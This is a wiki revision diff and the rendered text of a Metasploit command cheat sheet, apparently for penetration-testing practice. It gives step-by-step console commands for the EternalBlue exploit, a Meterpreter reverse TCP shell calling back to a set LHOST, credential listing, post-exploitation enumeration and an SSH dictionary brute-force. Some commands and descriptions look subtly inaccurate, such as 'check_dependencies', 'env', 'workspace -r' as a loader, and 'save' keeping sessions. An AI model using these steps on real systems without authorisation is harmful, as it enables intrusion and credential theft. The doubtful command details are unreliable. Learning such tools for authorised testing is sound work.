METASPLOIT - Base Commands: Difference between revisions
Created page with "Category:Wiki == Advanced Metasploit CLI Commands == === Starting Metasploit Console === To start the Metasploit Framework console, use the following command: <nowiki> msfconsole </nowiki> This launches the Metasploit interactive console, where you can execute various commands for penetration testing. === Search for Exploits === To search for a specific exploit module or vulnerability in Metasploit: <nowiki> search <search_term> </nowiki> For example, to searc..." |
No edit summary |
||
| Line 1: | Line 1: | ||
[[Category:Wiki]] | [[Category:Wiki]] | ||
== Starting Metasploit Console == | |||
To start the Metasploit Framework console, use the following command: | To start the Metasploit Framework console, use the following command: | ||
| Line 12: | Line 10: | ||
This launches the Metasploit interactive console, where you can execute various commands for penetration testing. | This launches the Metasploit interactive console, where you can execute various commands for penetration testing. | ||
== Search for Exploits == | |||
To search for a specific exploit module or vulnerability in Metasploit: | To search for a specific exploit module or vulnerability in Metasploit: | ||
| Line 27: | Line 25: | ||
This will list all relevant exploits, auxiliary modules, and payloads. | This will list all relevant exploits, auxiliary modules, and payloads. | ||
== Show Available Modules == | |||
To list all available Metasploit modules, use: | To list all available Metasploit modules, use: | ||
| Line 36: | Line 34: | ||
This command lists all types of modules, including exploits, auxiliary, post-exploitation, and payloads. | This command lists all types of modules, including exploits, auxiliary, post-exploitation, and payloads. | ||
== Use an Exploit Module == | |||
To use an exploit module: | To use an exploit module: | ||
| Line 51: | Line 49: | ||
This sets the module for use in the current session. | This sets the module for use in the current session. | ||
== Show Module Options == | |||
To view the options available for a specific module: | To view the options available for a specific module: | ||
| Line 60: | Line 58: | ||
This displays required and optional parameters for the current module. | This displays required and optional parameters for the current module. | ||
== Set Module Options == | |||
To set the required parameters for an exploit, such as the target IP address: | To set the required parameters for an exploit, such as the target IP address: | ||
| Line 69: | Line 67: | ||
Replace `<target_ip>` with the actual target machine's IP address. You can set other options in a similar way. | Replace `<target_ip>` with the actual target machine's IP address. You can set other options in a similar way. | ||
== Show Payloads == | |||
To list all available payloads for a specific exploit: | To list all available payloads for a specific exploit: | ||
| Line 78: | Line 76: | ||
This will show the payloads compatible with the currently selected exploit. | This will show the payloads compatible with the currently selected exploit. | ||
== Select and Set Payload == | |||
To select and configure a payload: | To select and configure a payload: | ||
| Line 103: | Line 101: | ||
</nowiki> | </nowiki> | ||
== Running the Exploit == | |||
Once the module and payload are set, you can run the exploit: | Once the module and payload are set, you can run the exploit: | ||
| Line 112: | Line 110: | ||
This will execute the exploit and attempt to gain access to the target machine. | This will execute the exploit and attempt to gain access to the target machine. | ||
== Running the Exploit in Background == | |||
If you want to run the exploit in the background without blocking the terminal: | If you want to run the exploit in the background without blocking the terminal: | ||
| Line 121: | Line 119: | ||
The `-j` flag runs the exploit as a background job. | The `-j` flag runs the exploit as a background job. | ||
== Show Sessions == | |||
To view active sessions after exploiting a target: | To view active sessions after exploiting a target: | ||
| Line 130: | Line 128: | ||
This command shows a list of all active sessions (Meterpreter or shell sessions). | This command shows a list of all active sessions (Meterpreter or shell sessions). | ||
== Interact with a Session == | |||
To interact with a specific session: | To interact with a specific session: | ||
| Line 145: | Line 143: | ||
This gives you a shell or Meterpreter prompt for that session. | This gives you a shell or Meterpreter prompt for that session. | ||
== Background a Session == | |||
To background a session and return to the main Metasploit console: | To background a session and return to the main Metasploit console: | ||
| Line 154: | Line 152: | ||
This command puts the current session in the background, allowing you to continue working on other tasks in the console. | This command puts the current session in the background, allowing you to continue working on other tasks in the console. | ||
== Session Cleanup == | |||
To terminate a specific session: | To terminate a specific session: | ||
| Line 169: | Line 167: | ||
This closes session 1. | This closes session 1. | ||
== Exploit Vulnerability Verification == | |||
To verify if a specific vulnerability exists on the target machine, use the following command: | To verify if a specific vulnerability exists on the target machine, use the following command: | ||
| Line 178: | Line 176: | ||
This will run basic checks to determine if the target is vulnerable to the selected exploit. | This will run basic checks to determine if the target is vulnerable to the selected exploit. | ||
== List Credentials == | |||
If you have gained access to the target system and want to list available credentials: | If you have gained access to the target system and want to list available credentials: | ||
| Line 187: | Line 185: | ||
This command shows all credentials (e.g., username and password pairs) captured during the session. | This command shows all credentials (e.g., username and password pairs) captured during the session. | ||
== Save Your Progress == | |||
To save the current state of your Metasploit session (including all modules, options, and sessions): | To save the current state of your Metasploit session (including all modules, options, and sessions): | ||
| Line 196: | Line 194: | ||
This will save your current Metasploit environment to the default location. | This will save your current Metasploit environment to the default location. | ||
== Load a Saved Workspace == | |||
To load a saved Metasploit workspace: | To load a saved Metasploit workspace: | ||
| Line 205: | Line 203: | ||
This will restore your saved workspace, including all settings, modules, and sessions. | This will restore your saved workspace, including all settings, modules, and sessions. | ||
== Managing Workspaces == | |||
To list all available workspaces: | To list all available workspaces: | ||
| Line 230: | Line 228: | ||
</nowiki> | </nowiki> | ||
== Running Auxiliary Modules == | |||
To use an auxiliary module (e.g., a scanner): | To use an auxiliary module (e.g., a scanner): | ||
| Line 239: | Line 237: | ||
You can then set the target and run the module just like with an exploit. | You can then set the target and run the module just like with an exploit. | ||
== Start a Post-Exploitation Module == | |||
Once you have access to a system, you can use post-exploitation modules. For example, to use a module that collects information about the target: | Once you have access to a system, you can use post-exploitation modules. For example, to use a module that collects information about the target: | ||
| Line 248: | Line 246: | ||
This collects information about logged-on users on the Windows target. | This collects information about logged-on users on the Windows target. | ||
== Show Help for Commands == | |||
To get help for a specific command or module, use: | To get help for a specific command or module, use: | ||
| Line 263: | Line 261: | ||
This will display detailed usage instructions and options for the command. | This will display detailed usage instructions and options for the command. | ||
== Advanced Search for Exploits == | |||
You can use advanced search queries to filter modules by specific parameters: | You can use advanced search queries to filter modules by specific parameters: | ||
| Line 272: | Line 270: | ||
This command searches for exploits related to the MS17-010 vulnerability on Windows platforms. | This command searches for exploits related to the MS17-010 vulnerability on Windows platforms. | ||
== Check for Dependencies == | |||
To check if a module has any missing dependencies before use: | To check if a module has any missing dependencies before use: | ||
| Line 281: | Line 279: | ||
This command will list any missing libraries or files needed to run a module. | This command will list any missing libraries or files needed to run a module. | ||
== Perform a Dictionary Attack == | |||
To use a dictionary attack against an SSH service, for example: | To use a dictionary attack against an SSH service, for example: | ||
| Line 294: | Line 292: | ||
This runs an SSH login brute-force attack using the specified username and password lists. | This runs an SSH login brute-force attack using the specified username and password lists. | ||
== Display Environment Variables == | |||
To display the current environment variables in Metasploit: | To display the current environment variables in Metasploit: | ||
| Line 303: | Line 301: | ||
This will show details about the current environment, including system and framework-specific variables. | This will show details about the current environment, including system and framework-specific variables. | ||
== Exit Metasploit Console == | |||
To exit the Metasploit console: | To exit the Metasploit console: | ||
Revision as of 16:33, 13 December 2025
Starting Metasploit Console
To start the Metasploit Framework console, use the following command:
msfconsole
This launches the Metasploit interactive console, where you can execute various commands for penetration testing.
Search for Exploits
To search for a specific exploit module or vulnerability in Metasploit:
search <search_term>
For example, to search for exploits related to "Windows SMB":
search smb windows
This will list all relevant exploits, auxiliary modules, and payloads.
Show Available Modules
To list all available Metasploit modules, use:
show modules
This command lists all types of modules, including exploits, auxiliary, post-exploitation, and payloads.
Use an Exploit Module
To use an exploit module:
use <module_path>
For example, to use an SMB exploit:
use exploit/windows/smb/ms17_010_eternalblue
This sets the module for use in the current session.
Show Module Options
To view the options available for a specific module:
show options
This displays required and optional parameters for the current module.
Set Module Options
To set the required parameters for an exploit, such as the target IP address:
set RHOST <target_ip>
Replace `<target_ip>` with the actual target machine's IP address. You can set other options in a similar way.
Show Payloads
To list all available payloads for a specific exploit:
show payloads
This will show the payloads compatible with the currently selected exploit.
Select and Set Payload
To select and configure a payload:
set PAYLOAD <payload_name>
For example, to set a reverse TCP payload:
set PAYLOAD windows/meterpreter/reverse_tcp
You can then set specific options for the payload, like the LHOST (local host IP):
set LHOST <local_ip>
- Example:
set LHOST 192.168.1.100
Running the Exploit
Once the module and payload are set, you can run the exploit:
exploit
This will execute the exploit and attempt to gain access to the target machine.
Running the Exploit in Background
If you want to run the exploit in the background without blocking the terminal:
exploit -j
The `-j` flag runs the exploit as a background job.
Show Sessions
To view active sessions after exploiting a target:
sessions
This command shows a list of all active sessions (Meterpreter or shell sessions).
Interact with a Session
To interact with a specific session:
sessions -i <session_id>
For example, to interact with session 1:
sessions -i 1
This gives you a shell or Meterpreter prompt for that session.
Background a Session
To background a session and return to the main Metasploit console:
background
This command puts the current session in the background, allowing you to continue working on other tasks in the console.
Session Cleanup
To terminate a specific session:
sessions -k <session_id>
For example:
sessions -k 1
This closes session 1.
Exploit Vulnerability Verification
To verify if a specific vulnerability exists on the target machine, use the following command:
check
This will run basic checks to determine if the target is vulnerable to the selected exploit.
List Credentials
If you have gained access to the target system and want to list available credentials:
creds
This command shows all credentials (e.g., username and password pairs) captured during the session.
Save Your Progress
To save the current state of your Metasploit session (including all modules, options, and sessions):
save
This will save your current Metasploit environment to the default location.
Load a Saved Workspace
To load a saved Metasploit workspace:
workspace -r <workspace_file>
This will restore your saved workspace, including all settings, modules, and sessions.
Managing Workspaces
To list all available workspaces:
workspace
To create a new workspace:
workspace -a <workspace_name>
To switch between workspaces:
workspace <workspace_name>
- Example:
workspace my_new_workspace
Running Auxiliary Modules
To use an auxiliary module (e.g., a scanner):
use auxiliary/scanner/portscan/tcp
You can then set the target and run the module just like with an exploit.
Start a Post-Exploitation Module
Once you have access to a system, you can use post-exploitation modules. For example, to use a module that collects information about the target:
use post/windows/gather/enum_logged_on_users
This collects information about logged-on users on the Windows target.
Show Help for Commands
To get help for a specific command or module, use:
help <command>
For example, to get help on the `sessions` command:
help sessions
This will display detailed usage instructions and options for the command.
Advanced Search for Exploits
You can use advanced search queries to filter modules by specific parameters:
search type:exploit platform:windows name:ms17_010
This command searches for exploits related to the MS17-010 vulnerability on Windows platforms.
Check for Dependencies
To check if a module has any missing dependencies before use:
check_dependencies
This command will list any missing libraries or files needed to run a module.
Perform a Dictionary Attack
To use a dictionary attack against an SSH service, for example:
use auxiliary/scanner/ssh/ssh_login set RHOSTS <target_ip> set USER_FILE /path/to/usernames.txt set PASS_FILE /path/to/passwords.txt run
This runs an SSH login brute-force attack using the specified username and password lists.
Display Environment Variables
To display the current environment variables in Metasploit:
env
This will show details about the current environment, including system and framework-specific variables.
Exit Metasploit Console
To exit the Metasploit console:
exit
This command will close the Metasploit Framework console and return to the command-line prompt.
